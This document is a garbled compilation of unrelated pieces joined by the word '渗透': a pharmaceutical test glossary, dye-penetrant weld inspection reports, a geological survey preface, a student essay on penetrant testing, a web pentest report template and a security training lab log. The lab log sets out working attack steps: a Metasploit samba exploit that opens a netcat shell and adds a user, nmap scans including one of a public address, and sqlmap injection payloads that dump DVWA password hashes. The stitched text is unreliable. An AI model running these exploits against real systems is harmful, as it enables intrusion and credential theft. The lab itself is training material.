渗透检测报告中英文

1 .检验报告Certificate of analysis2. 厂家2.1 化工有限公司 chemical CO., LTD2.2 化工厂 CHEMICAL PLANT2.3 精细化工有限公司 FINE CHEMICAL CO.,LTD2.4 药业股份公司 PHARMACEUTICAL CO., LTD3.3.1 品名 PRODUCT3.2. 批号 batch NO.3.3 生产日期 manufacturing date // manu. Date3.4 有效期 Exp date // expiry date3.5 检验依据 quality standard //inspecting basis3.6 规格 PACK SIZE3.7 数量 QUANTITY3.8 报告日期 report date3.9 包装 package3.10. 分子式 molecular formula分子量 molecular wt4. 检查项目 test items//analytical items4.1 性状 appearance // characteristics//description4.2 鉴别 identification IR spectrum HPLC—retention4.3 溶液外观 appearance of solution4.4 澄清度 clarity ……..4.5 颜色 color ……….4.6 酸碱度 acidity and alkalinity4.7 有关物质 related substances 分为：individual impurity substance NMT….；total impurity substance NMT。

4.8 干燥失重 loss on drying℃ to a constant weight& Dry (the sample) to a constant weight at 105℃4.9 炽灼残渣residue on ignition4.10 重金属 heavy metals4.11 溶剂残留 residue4.12 有机挥发性物质 organic volatile impurities4.13 溶解度solubility4.14 熔点melting point4.15 旋光度optical rotation4.16 灰分 sulphated ash4.17 水分water content4.18 粒度particles size ／／mesh size4.19 PH Value4.20 农药残留 residue of pesticide4.21 细菌总数total plate count 霉菌和酵母菌yeast & mold 大肠杆菌Ｅ。

烟 台 锅 炉 容 器 有 限 公 司渗透检测报告产品编号：R11009部件名称蒸发器材料牌号06Cr19Ni10/Q235B部件编号表面状态合格工件检测部位焊缝渗透剂种类着色渗透剂检测方法HC-d渗透剂DPT-5乳化剂清洗剂DPT-5显像剂DPT-5渗透剂施加方法喷渗透时间10 min乳化剂施加方法□喷□刷□浸□浇乳化时间min显像剂施加方法喷显像时间7min器材及参数工件温度18℃对比试块类型□铝合金□镀铬检测比例100％合格级别Ⅰ 级技术要求检测标准JB/T4730.5-2005检测工艺编号缺陷处理方式及结果打磨后复检缺陷补焊后复检缺陷序号焊缝（工件）部位编号缺陷编号缺陷类型缺陷痕迹尺寸㎜性质痕迹尺寸㎜性质痕迹尺寸㎜最终评级（级）1C3无Ⅰ2C11无Ⅰ3C12无Ⅰ4C15无Ⅰ检测部位缺陷情况检测结论：1、本产品符合 JB/T1730.5-2005 标准的要求，评定为合格。

2、检验部位及缺陷位置详见检测部位示意图（另附）。

报告人（资格）年月 日审核人（资格）年月日无损检测专用章年月 日渗透检测报告产品编号：R11008部件名称蒸发器材料牌号06Cr19Ni10/Q235B部件编号表面状态合格工件检测部位焊缝渗透剂种类着色渗透剂检测方法HC-d渗透剂DPT-5乳化剂清洗剂DPT-5显像剂DPT-5渗透剂施加方法喷渗透时间10 min乳化剂施加方法□喷□刷□浸□浇乳化时间min显像剂施加方法喷显像时间7min器材及参数工件温度18℃对比试块类型□铝合金□镀铬检测比例100％合格级别Ⅰ 级技术要求检测标准JB/T4730.5-2005检测工艺编号缺陷处理方式及结果打磨后复检缺陷补焊后复检缺陷序号焊缝（工件）部位编号缺陷编号缺陷类型缺陷痕迹尺寸㎜性质痕迹尺寸㎜性质痕迹尺寸㎜最终评级（级）1B2无Ⅰ2C2无Ⅰ3C15无Ⅰ4C16无Ⅰ5C19无Ⅰ检测部位缺陷情况检测结论：1、本产品符合 JB/T1730.5-2005 标准的要求，评定为合格。

1.0 、前言Foreword受××（中国）有限公司和×××化工工程有限公司委托，我院对拟建“巴斯夫INTERMEDIATES THF/POLY-THF项目”场地进行工程地质勘察工作。

Commissioned by×× (China) Co., Ltd and×× Chemical Engineering Co.,Ltd， our institute has undertaken the engineering geologic investigation of the INTERMEDIATES THF/POLY-THF Project.1.1、工程概况Project profile拟建工程位于上海市化学工业区B700～B900地块内，东近目华路、南近南河。

场地内主要拟建工艺装置区及辅助配套建筑物，各拟建（构）筑物的设计参数见表1，平面位置见“勘探孔平面布置图”。

The project is located in Plot B700～B900 of Shanghai Caojing Chemical Industry Park (SCIP). It is to the west of Muhua Rd and to the north of Nan River.Please refer to Table 1 for the proposed process plant, the accessory buildings, the design parameters of the proposed buildings (structures). Please refer to the Floor Plan of the Boreholes for1.2、勘察目的及技术要求I nvestigation purposes and technical requirements本次勘察属详细勘察阶段，目的是为拟建(构)筑物的基础工程、基坑工程和厂区道路，地坪工程的设计、施工提供必要的工程地质资料。

CF8M渗透检测报告PRECISE MACHINERY MANUFCATURE CO、,LTD渗透检验报告Liquid Perant Examination Report编号NO:产品名称Item阀体图号/修改号DWG NO/REV探伤时机FAB Stage焊后检验部位Location工件规格DimensionS42-16＂材料牌号MaterialASTMA351 CF8M检验比例Ratio of Test100%验收标准Accep、 STDSE-165工艺规程号ProcedureWLFQS707检验部位温度Temp、 Of Part实际温度Ⅰ、检验条件 Test Condition设备型号Equipment 根据型号试块型号Test blockB型表面状况Surface合格检验方法Method渗透剂PerantHD-RS清洗剂CleanerHD-BX显像剂DeveloperHD-XS施加方法Application喷涂渗透时间Dwell time10min显像时间Dev、 time15min观察条件Visible Condition1000LXⅡ、检验记录 Test Record部件名称Part Name 部件编号Part Np、数量Quantity焊缝号Seam No、缺陷位置Position of defectXYS42-16＂阀体-11见示意图见示意图X: 离左端的距离 (The distance from left end)Y: 离焊缝中心的距离(The distance from center line of seam)Ⅲ、检验结论Test Result 该部位没有超标缺陷显示操作者Operator级别Level日期Date审核者Reviewer级别Level日期DateA、I日期Date Rev、0渗透检验工艺卡Liquid Perant Examination Instruction工艺卡号PTI No、/Rev、工艺规程号PROC NO/ Rev、页PAGEof产品名称PROD NAME验收标准ACCEP、 STD部件名称PART NAME部件图号PARTDWG、 NO、材料和类型MATERIAL AND TYPE规格DIMENSION检验阶段TEST STAGE 坡口形式GROOVE TYPE焊接方式WELDING PROC铸件Cast1、检验准备 TEST PREPARE渗透剂PERANT清洗剂REMOVER显象剂DEVELOPER检验方法TEST METHOD施加方法APPLICATION清洗方法CLEANING试块型号TEST BLOCK检验部位TEST AREA2、检验工艺参数 TEST DETAIL渗透时间PERNT TIME显象时间DEVELOP TIME检验部位温度TEMP OF PART检验条件INSPECTION CONDITION3、检验示意图 SKETCH OF EXAMINED AREA备注REMARK编制PREPARE日期DATE批准APPROVE日期DATEREV 、0渗透检验示意图SKETCH OF EXAMINED AREA编制Prepare日期Date审核Review日期Date。

渗透检报告模板
一、概要
在本次的渗透检测中，我们针对目标网站进行了全面的渗透测试，发现如下问题：
1.存在未授权访问漏洞，可能导致敏感信息泄露；
2.存在弱口令漏洞，可能导致恶意攻击者获得系统权限；
3.存在文件上传漏洞，可能导致恶意文件上传和执行。

二、漏洞详情
1. 未授权访问漏洞
该漏洞出现在目标网站的管理员后台，我们通过在网站URL中添加一些特定的参数，可以访问到管理员的页面，该页面包含了很多敏感的信息，例如数据库密码、PHPMyAdmin登录等。

2. 弱口令漏洞
我们在渗透测试中发现了一些用户账号存在弱口令的情况，例如：
•用户名：admin，密码：password
•用户名：root，密码：123456
这些弱口令可被恶意攻击者轻易地猜测到，并且可以通过暴力破解的方式获得系统权限，进而进行其他攻击行为。

3. 文件上传漏洞
我们在渗透测试中发现，目标网站存在文件上传漏洞，攻击者可以将恶意脚本上传到服务器上，并通过执行该脚本实施攻击行为。

三、建议
针对上述漏洞，我们提出以下建议：
1. 修补未授权访问漏洞
我们建议目标网站管理员尽快修补未授权访问漏洞，可以通过添加身份验证、增强访问权限等方式进行修补。

2. 加强口令安全性
对于存在弱口令的用户账号，我们建议管理员及时修改密码，并采用复杂的、
难以猜测的密码。

3. 修补文件上传漏洞
我们建议目标网站管理员尽快修复文件上传漏洞，可以通过加强上传文件格式、加强文件上传目录权限等方式进行修补。

四、结论
综上所述，目标网站存在未授权访问漏洞、弱口令漏洞和文件上传漏洞，我们
建议管理员尽快修复漏洞，加强网站的安全性。

UHI BEngControl and InstrumentationCoursework 1-Instrumentation InvestigationTutors: Adam SmithTITLE: Penetrant testing NAME: Feipeng YangSHORT NAME: FroggenCALSS CODE: Mechanical 1201 class REGISTRATION NUMBER: UH609809DATE: 06/11/2014‘I certify that this is all my own work and I have done my best!’Introduction1.HISTORY IN CHINAIn the 1950s, Some large state-owned enterprises to set up NDT department，magnetic particle texting and penetrant testing of China got started. In the 1960s, China developed the large ac magnetic particle inspection machine by imitation. In 1987, China association of nondestructive testing wad found include Magnetic powder, penetrant testing professional committee, and held a national technology exchange meeting for the first time. In 1982, the domestic first open magnetic powder, penetrant testing professional level II personnel training, the end of the unlicensed operation testing personnel history. In the 1990s, the standardization work made important progress, powder, penetrant testing technology standardization system basic formation. Since 2000, along with the development of digital culture technology, penetrant testing technology into the era of automation and visualization.2.DEFINITIONPenetrant Testing is a kind of based on the principle of capillary action check open defect on the surface of nondestructive testing methods.3.PRINCIPLEOf drain holes is mainly used to detect the metal or nonmetal parts surface defects. When testing, sprinkle the penetrant of fluorescent dye or colored dye on surface of the parts, due to the capillarity, Penetrant will seep into the tiny defects in the surface of the openings, remove the excess penetrant, add imaging agent after it drying, because of the capillarity penetrant that is in the defects can adsorption to the parts surface again, then will form the defect display of the magnified., The morphology and distribution of defects can be detected.4.NECESSITYPT is widely used in the word piece, component, product or material quality inspection. To a certain extent, PT determines the reliability of the work piece, and it is one of the important conditions ensure that the product is safe,5.PT MATERIALSI.Penetrants.(1)Liquid dye penetranta.Washing liquid dye penetrant-Type water-based dye penetrant fluid.-Since the emulsification liquid dye penetrant.b.After emulsification liquid dye penetrantc.Solvent to remove liquid dye penetrant(2)Fluorescent penetrantsa.Water type fluorescent penetrants-Water-based type fluorescent penetrants-The emulsion type fluorescent penetrantsb.After the emulsion type fluorescent penetrants(3)Solvent to remove type fluorescent penetrants(4)Other penetranta.Color fluorescent penetrantsb.Chemical reaction penetrating fluidc.Filterability particle penetrating fluidII.Emulsifier: Emulsion does not dissolve in water infiltration fluid, make it easy to clean with water.III. Solvent remover: The solvent used to remove excess penetrant work piece surface. Water, emulsifier and water, Organic solvent.IV. Imaging agent: Used in a defect in the infiltration liquid adsorption, forming defect images.V. Block. The specimen with artificial defects and natural defects, and it is measured seepage detection sensitivity of the equipment. 6.PENTRATION TESTING APPARATUSa. Portable testing device Consist of Penetrating fluid spray irrigation, Cleaner spray irrigation, Imaging agent for sprinkler, light, brush and metal brush.b. Stationary seepage detection device Consist of pre-cleaning device, Osmosis device, Emulsification device, Imaging device, Drying device, Post-processing equipment.c. Black light7.PROS AND CONS OF PTPrimary advantages-The method has high sensitivity.-The method is easy to operate and the principle is simple.-When inspected large areas and large volumes of parts can be faster and at low cost.Primary disadvantages-It has the complex process and severe pollution.-Only surface breaking defects can be detected-The inspector must have direct access to the surface being inspected. -Surface finish and roughness can affect inspection sensitivity.8.CLASSIFICATION1.According to the penetration of liquid fuel. -Penetrant inspection method- fluorescence detection method2. According to the cleaning method.- Water penetration testing method- Emulsion type after inspection- Solvent cleaning type detection method 3. According to the imaging way.- Dry imaging- Quick dry imaging- Wet imaging- Since the imaging penetration testingMethod and stepsSTEP1.PretreatmentTo obtain good detection effect, the first condition is penetrating fluid into fully defects, pretreatment is the operation that in advance to eliminate defects may hinder the penetration and influence of imaging. It greatly affect the sensitivity of the detection of defects. Remove mild dirt and grease can use the solvent detergent, but if the coating or scale covered the surface of the test, the penetrating fluid will could not permeate through defects.Materials and work piece must be drying after clean to remove excess water and solvent detergent in defects, otherwise, they will hinder the penetration.2.PenetrationPenetration is saturated liquid suction defects of internal operations. To achieve full penetration, the penetrant must always fully covered on the surface of the work piece in the process of osmosis. In the practical work, the method of covered should depend on parts of number, size, shape and the kind of penetration fluid. In general, the use of penetrating agent temperature is 15~40 °C. The choice of infiltration time should be according to the requirements of parts requirement found defect types, surface state and the kinds of penetrating agent, usually 5~20minutes.For some parts in penetration can be loaded at the same time to make the tiny crack open, it is advantageous to the infiltration of penetrating agent, in order to detect the tiny crack.3.CleaningIn the coating after penetrating agent and maintain the appropriate time, should remove excess penetrant parts surface, but cannot wash out the penetrant of the defects, to ensure the highest sensitivity.The water penetrant agent can directly use water to remove. Water washing method have mixing invasion washing, spraying water flushing and spray nozzle concentrated wash several more, Attention should be paid to control water temperature, time and stress level. And the time of emulsion should be appropriate. Time is too long, the penetrant in small internal defects will be emulsified and cleaned; Time is too short, penetrant on the surface of the parts have the inadequate emulsion, surface is not clean. Solvent to remove penetrant agent direct use solvent to erasure.4.DryThe purpose of drying is to remove moisture on the surface of the parts. The remove of solvent penetrant need not special drying process. There are list several kinds of drying methods below:-Dry with a clean cloth.-Use compressed air to blow dry.-Use heat air to blow dry.-Hot air circulation drying.Drying temperature cannot be too high, in order to prevent the penetrant of the defect is drying, lead to when imaging the penetrant could not be adsorbed on the surface of the parts, and the drying time should be shorten as much as possible. In the process of actual operation. In the process of drying, these situations will damage to the work piece surface, so they should be avoid:-The operator’s hand have grease.-There are residual penetrant on parts quantico.5.ImagingImaging is to use imaging agent make penetrant in defects adsorbed to the surface of parts, to form the clear images of the detects. According to the different imaging agent, imaging methods can be divided into:-Dry.-The type of water.-The type of no water.The imaging agent should evenly coated on the surface part, and with only a coating, an area cannot coated again and again.6.InspectionWhen the dye penetrant inspection, imaging of the parts can be observed under natural light or white light, do not need special observation device. When fluorescent inspection, imaging should be justput in a dark room, and observe under the irradiation of ultraviolet light. For some false shows, use a clean cloth or cotton ball with a small amount of alcohol to wipe display area, after wiping can still show is really defect, can no longer shows the false defects. According to the amount of penetrant that exudes in the defects, can be a rough estimate the depth of the defects.7.Post-processingAfter penetrant testing, residual penetrant agent on the surface of the parts and imaging agent should be clean in time. For most imaging agent and residual penetrant agent, just use compressed air blowing or washing method to remove; For the part which need to repeated penetration test or use in a special background, they should be through cleaning with solvent.8.Records and reportsa.Record sketching; Copy-and-paste technology; Takingpicturesb.Content-The condition of the work piece-The method and condition of inspection-Inspection results-Inspection personnel and the dateBlock Diagrams 1. Water-Washable2. Solvent Removable3. Post-Emulsifiable, Lipophilic4. Post-Emulsifiable, HydrophilicReliability of inspectionThe influencing factors of reliability as follow :(a) The strength of the capillarity effect.(b) The correspondence between the artificial defects of the blockand the actual surface detects.(c)Penetrant testing method and choice of process.Clearly, in order to improve the reliability of penetrant testing, must choose reasonable penetration testing agent and penetrant testing process, reasonable using the standard test block and the actual tested pressure vessel defects block, using feasible permeability test method standard, to strengthen the management of penetrant testing personnel. Quality control(1) T he reference blocks: type A; type B; type C(2) C ontrol the quality of the material of penetrant inspectiona.Check the appearance of the penetrant, wet, the corrosive,water content, the sensitivity, the brightness of the fluorescentregularly.b. Check the removal of emulsifier and the degree of pollution.c. Check the appearance and the adhesion of the imaging agent.(3) Q uality control inspectiona.Check the equipment and measuring instrument regularly.b.Test the inspection personnel qualification regularly.(4) t echnology security of Penetrant inspectiona.Due to the most materials of the penetration testing withcertain toxicity and volatile, so gas and fire should be payattention to.b. The inspection personnel should have protective measures andavoid skin contact.References1. --Liquid Penetrant Testing, Nondestructive Testing Handbook, Volume 2,Tracy,Noel (Tech. Ed.), Moore, Patrick (Ed.) American Society for Nondestructive Testing, Columbus, OH, 1999, ISBN 1-57117-028-62.3./index.aspx?pageID=164&ID=3744./link?url=kX9Ksa8A_kCelr9_sN6eodbopIWss1tqoXg0eIKqc7_LZevfORB1X5Bwrfd218cxM9trQOIICfdkdAuu4ciSv9a0Bz4EUpEFJJqFewDUX8i 5./link?url=cxSkinpbTCReFPJyJFgq-QyUWvjeXM-nmkt_W05fON69uNkp_NqLTQxks2qHUr2LIX4snPoB0CnpzO8KTpdv2p04d_8scK62 sbLWozBroEq。

渗透测试实验报告（中国移动安全部）渗透测试培训3月13日第一天：主要实验总结首先利用struts2漏洞，可以直接执行任意命令，取得主机控制权。

实验环境：KALI linux 作为攻击工具；owasp 作为靶机2003 metaspoitable 实现能够成功访问使用metaspliot完成对于靶机samba 服务的攻击，获取shell 权限search samba 查找模块Use multi/samba/usemap_script 选择渗透攻击模块Show payloads 查看与该渗透模块相兼容的攻击载荷Set payload cmd/unix/bind_netcat选择netcat工具在渗透攻击成功后执行shellShow options 查看需要设置的参数Set RHOST 10.10.10.254 设置主机攻击主机Exploit启动攻击1、首先安装vm虚拟机程序，开启kali，owasp和metaspoitalbe等工具和搭建环境，使得网络可达，网络配置上选择nat模式，地址范围为10.10.10.0/242、开启kali虚机，进入root模式，首先进入msfconsle，修改初始密码为123456msf〉> passwd[*] exec: passwd输入新的UNIX 密码：重新输入新的UNIX 密码：passwd：已成功更新密码然后寻找samba模块msf > search sambaMatching Modules================Name Disclosure Date Rank Description---- --------------- ---- -----------auxiliary/admin/smb/samba_symlink_traversal normal Samba Symlink Directory Traversalauxiliary/dos/samba/lsa_addprivs_heap normal Samba lsa_io_privilege_set Heap Overflowauxiliary/dos/samba/lsa_transnames_heap normal Samba lsa_io_trans_names Heap Overflowauxiliary/dos/samba/read_nttrans_ea_list normal Samba read_nttrans_ea_list Integer Overflowexploit/freebsd/samba/trans2open 2003-04-07 great Samba trans2open Overflow (*BSD x86)exploit/linux/samba/chain_reply 2010-06-16 good Samba chain_reply Memory Corruption (Linux x86)exploit/linux/samba/lsa_transnames_heap 2007-05-14 good Samba lsa_io_trans_names Heap Overflowexploit/linux/samba/setinfopolicy_heap 2012-04-10 normal Samba SetInformationPolicy AuditEventsInfo Heap Overflow exploit/linux/samba/trans2open 2003-04-07 great Samba trans2open Overflow (Linux x86)exploit/multi/samba/nttrans 2003-04-07 average Samba 2.2.2 - 2.2.6 nttrans Buffer Overflowexploit/multi/samba/usermap_script 2007-05-14 excellent Samba "username map script" Command Executionexploit/osx/samba/lsa_transnames_heap 2007-05-14 average Samba lsa_io_trans_names Heap Overflowexploit/osx/samba/trans2open 2003-04-07 great Sambatrans2open Overflow (Mac OS X PPC)exploit/solaris/samba/lsa_transnames_heap 2007-05-14 average Samba lsa_io_trans_names Heap Overflowexploit/solaris/samba/trans2open 2003-04-07 great Samba trans2open Overflow (Solaris SPARC)exploit/unix/misc/distcc_exec 2002-02-01 excellent DistCC Daemon Command Executionexploit/unix/webapp/citrix_access_gateway_exec 2010-12-21 excellent Citrix Access Gateway Command Executionexploit/windows/http/sambar6_search_results 2003-06-21 normal Sambar 6 Search Results Buffer Overflowexploit/windows/license/calicclnt_getconfig 2005-03-02 average Computer Associates License Client GETCONFIG Overflowpost/linux/gather/enum_configs normal Linux Gather Configurationsmsf > use multi/samba/usermap_script 选择渗透攻击模块msf exploit(usermap_script) > show payloads 查看与该渗透模块相兼容的攻击载荷Compatible Payloads===================Name Disclosure Date Rank Description---- --------------- ---- -----------cmd/unix/bind_awk normal Unix Command Shell, Bind TCP (via AWK)cmd/unix/bind_inetd normal Unix Command Shell, Bind TCP (inetd) cmd/unix/bind_lua normal Unix Command Shell, Bind TCP (via Lua) cmd/unix/bind_netcat normal Unix Command Shell, Bind TCP (via netcat)cmd/unix/bind_netcat_gaping normal Unix Command Shell,Bind TCP (via netcat -e)cmd/unix/bind_netcat_gaping_ipv6 normal Unix Command Shell, Bind TCP (via netcat -e) IPv6cmd/unix/bind_perl normal Unix Command Shell, Bind TCP (via Perl) cmd/unix/bind_perl_ipv6 normal Unix Command Shell, Bind TCP (via perl) IPv6cmd/unix/bind_ruby normal Unix Command Shell, Bind TCP (via Ruby)cmd/unix/bind_ruby_ipv6 normal Unix Command Shell, Bind TCP (via Ruby) IPv6cmd/unix/bind_zsh normal Unix Command Shell, Bind TCP (via Zsh) cmd/unix/generic normal Unix Command, Generic Command Executioncmd/unix/reverse normal Unix Command Shell, Double Reverse TCP (telnet)cmd/unix/reverse_awk normal Unix Command Shell, Reverse TCP (via AWK)cmd/unix/reverse_lua normal Unix Command Shell, Reverse TCP (via Lua)cmd/unix/reverse_netcat normal Unix Command Shell, Reverse TCP (via netcat)cmd/unix/reverse_netcat_gaping normal Unix Command Shell, Reverse TCP (via netcat -e)cmd/unix/reverse_openssl normal Unix Command Shell, Double Reverse TCP SSL (openssl)cmd/unix/reverse_perl normal Unix Command Shell, Reverse TCP (via Perl)cmd/unix/reverse_perl_ssl normal Unix Command Shell, Reverse TCP SSL (via perl)cmd/unix/reverse_php_ssl normal Unix Command Shell,Reverse TCP SSL (via php)cmd/unix/reverse_python normal Unix Command Shell, Reverse TCP (via Python)cmd/unix/reverse_python_ssl normal Unix Command Shell, Reverse TCP SSL (via python)cmd/unix/reverse_ruby normal Unix Command Shell, Reverse TCP (via Ruby)cmd/unix/reverse_ruby_ssl normal Unix Command Shell, Reverse TCP SSL (via Ruby)cmd/unix/reverse_ssl_double_telnet normal Unix Command Shell, Double Reverse TCP SSL (telnet)cmd/unix/reverse_zsh normal Unix Command Shell, Reverse TCP (via Zsh)msf exploit(usermap_script) > set payload cmd/unix/bind_netcat 选择netcat工具在渗透攻击成功后执行shell payload => cmd/unix/bind_netcatmsf exploit(usermap_script) > show options 查看需要设置的参数msf exploit(usermap_script) > set RHOST 10.10.10.254设置主机攻击主机RHOST => 10.10.10.254msf exploit(usermap_script) > exploit启动攻击[*] Started bind handler[*] Command shell session 1 opened (10.10.10.128:56558 -> 10.10.10.254:4444) at 2015-03-13 16:06:40 +0800已经取得10.10.10.254机子的控制权，可以增加用户useradd test 用户增加成功&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& &&&&&&&&&&&&&&&&&&&&&&&&存活探测-PU -sn UDP ping不列服务，-Pn不适用pingnmap -sS -Pn xx.xx.xx.xx tcp syn 扫描不发送icmpnamp -sV -Pn xx.xx.xx.xx 列出服务详细信息namp -PO -script=smb-check-vulns xx.xx.xx.xx 查找ms-08067漏洞&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& &&&&&&&&&&&nmap 网站扫描msf > nmapmsf > nmap -sV -Pn 10.10.10.254[*] exec: nmap -sV -Pn 10.10.10.254Starting Nmap 6.46 ( ) at 2015-03-13 16:38 CSTNmap scan report for 10.10.10.254Host is up (0.00020s latency).All 1000 scanned ports on 10.10.10.254 are filteredMAC Address: 00:50:56:E7:1B:31 (VMware)Service detection performed. Please report any incorrect results at .Nmap done: 1 IP address (1 host up) scanned in 22.84 secondsmsf > nmap -PO -script=smb-check-vulns 10.10.10.254[*] exec: nmap -PO -script=smb-check-vulns 10.10.10.254Starting Nmap 6.46 ( ) at 2015-03-13 16:47 CSTNmap scan report for 10.10.10.254Host is up (0.00021s latency).All 1000 scanned ports on 10.10.10.254 are filteredMAC Address: 00:50:56:E7:1B:31 (VMware)map done: 1 IP address (1 host up) scanned in 23.06 seconds %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%msf > nmap -O[*] exec: nmap -OStarting Nmap 6.46 ( ) at 2015-03-13 17:16 CSTNmap scan report for (211.100.35.132)Host is up (0.0054s latency).Not shown: 999 filtered portsPORT STATE SERVICE80/tcp open httpWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Brother MFC-7820N printer (94%), Digi Connect ME serial-to-Ethernet bridge (94%), Netgear SC101 Storage Central NAS device (91%), ShoreTel ShoreGear-T1 VoIP switch (91%), Aastra 480i IP Phone or Sun Remote System Control (RSC) (91%), Aastra 6731i VoIP phone or Apple AirPort Express WAP (91%), Cisco Wireless IP Phone 7920-ETSI (91%), GoPro HERO3 camera (91%), Konica Minolta bizhub 250 printer (91%), Linux 2.4.26 (Slackware 10.0.0) (86%)No exact OS matches for host (test conditions non-ideal).OS detection performed. Please report any incorrect results at .Nmap done: 1 IP address (1 host up) scanned in 57.88 secondsmsf > use auxiliary/scanner/http/dir_scannermsf auxiliary(dir_scanner) > set THREADS 50THREADS => 50msf auxiliary(dir_scanner) > set RHOSTSRHOSTS =>msf auxiliary(dir_scanner) > run[*] Detecting error code[*] Detecting error code[*] Scanned 2 of 2 hosts (100% complete)[*] Auxiliary module execution completedsqlmap 检查sql注入的漏洞root@kali:~# sqlmaproot@kali:~# sqlmap -u "" --cookie="security=low; PHPSESSID=lu1d2nfdvfkgkc8fa628c0vh23"带cookie的方式查出这个网站数据库的用户和密码sqlmap/1.0-dev - automatic SQL injection and database takeover tool[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 11:50:20[11:50:20] [INFO] testing connection to the target URL[11:50:20] [INFO] testing if the target URL is stable. This can take a couple of seconds[11:50:21] [INFO] target URL is stable[11:50:21] [INFO] testing if GET parameter 'id' is dynamic[11:50:21] [INFO] confirming that GET parameter 'id' is dynamic[11:50:21] [INFO] GET parameter 'id' is dynamic[11:50:21] [INFO] heuristics detected web page charset 'ascii' [11:50:21] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL') [11:50:21] [INFO] testing for SQL injection on GET parameter 'id' heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] ydo you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] y[11:50:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'[11:50:25] [WARNING] reflective value(s) found and filtering out[11:50:25] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable [11:50:25] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'[11:50:25] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable [11:50:25] [INFO] testing 'MySQL inline queries'[11:50:25] [INFO] testing 'MySQL > 5.0.11 stacked queries' [11:50:25] [WARNING] time-based comparison requires larger statistical model, please wait...........[11:50:25] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'[11:50:25] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'[11:50:36] [INFO] GET parameter 'id' seems to be 'MySQL > 5.0.11 AND time-based blind' injectable[11:50:36] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'[11:50:36] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found[11:50:36] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for currentUNION query injection technique test [11:50:36] [INFO] target URL appears to have 2 columns in query[11:50:36] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectableGET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] nsqlmap identified the following injection points with a total of 41 HTTP(s) requests:---Place: GETParameter: idType: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clause Payload: id=1' AND 4334=4334 AND 'iasX'='iasX&Submit=SubmitType: error-basedTitle: MySQL >= 5.0 AND error-based - WHERE or HAVING clausePayload: id=1' AND (SELECT 4941 FROM(SELECT COUNT(*),CONCAT(0x71626e6f71,(SELECT (CASE WHEN (4941=4941) THEN 1 ELSE 0 END)),0x7163716271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'zAHU'='zAHU&Submit=Submit Type: UNION query Title: MySQL UNION query (NULL) - 2 columnsPayload: id=1' UNION ALL SELECT NULL,CONCAT(0x71626e6f71,0x4b4977451,0x7163716271)#&S ubmit=SubmitType: AND/OR time-based blindTitle: MySQL > 5.0.11 AND time-based blindPayload: id=1' AND SLEEP(5) AND 'xfNp'='xfNp&Submit=Submit---[11:50:40] [INFO] the back-end DBMS is MySQLweb server operating system: Linux Ubuntu 10.04 (Lucid Lynx) web application technology: PHP 5.3.2, Apache 2.2.14back-end DBMS: MySQL 5.0[11:50:40] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/10.10.10.129'[*] shutting down at 11:50:40root@kali:~# sqlmap -u "" --cookie="security=low; PHPSESSID=lu1d2nfdvfkgkc8fa628c0vh23" -p id --dbs 可以看出返回数据库为：[11:53:32] [WARNING] reflective value(s) found and filtering outavailable databases [2]:[*] dvwa[*] information_schemaroot@kali:~# sqlmap -u "" --cookie="security=low; PHPSESSID=lu1d2nfdvfkgkc8fa628c0vh23" -p id -D dvwa --tables 查看dvwa数据库Database: dvwa[2 tables]+-----------+| guestbook || users |+-----------+root@kali:~# sqlmap -u "" --cookie="security=low; PHPSESSID=lu1d2nfdvfkgkc8fa628c0vh23" -p id -D dvwa -T users --columnsDatabase: dvwaTable: users[6 columns]+------------+-------------+| Column | Type |+------------+-------------+| user | varchar(15) || avatar | varchar(70) || first_name | varchar(15) || last_name | varchar(15) || password | varchar(32) || user_id | int(6) |+------------+-------------+root@kali:~# sqlmap -u "" --cookie="security=low; PHPSESSID=lu1d2nfdvfkgkc8fa628c0vh23" -p id -D dvwa -T users -C user,password --dumpDatabase: dvwaTable: users[5 entries]+---------+--------------------------------------------+| user | password |+---------+--------------------------------------------+| 1337 | 8d3533d75ae2c3966d7e0d4fcc69216b (charley) || admin | 21232f297a57a5a743894a0e4a801fc3 (admin) || gordonb | e99a18c428cb38d5f260853678922e03 (abc123) | | pablo | 0d107d09f5bbe40cade3de5c71e9e9b7 || smithy | 5f4dcc3b5aa765d61d8327deb882cf99 |+---------+--------------------------------------------+可以看出用户名为admin 密码是admin成功2day&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& &&&&&情报收集whois 域名注册信息查询。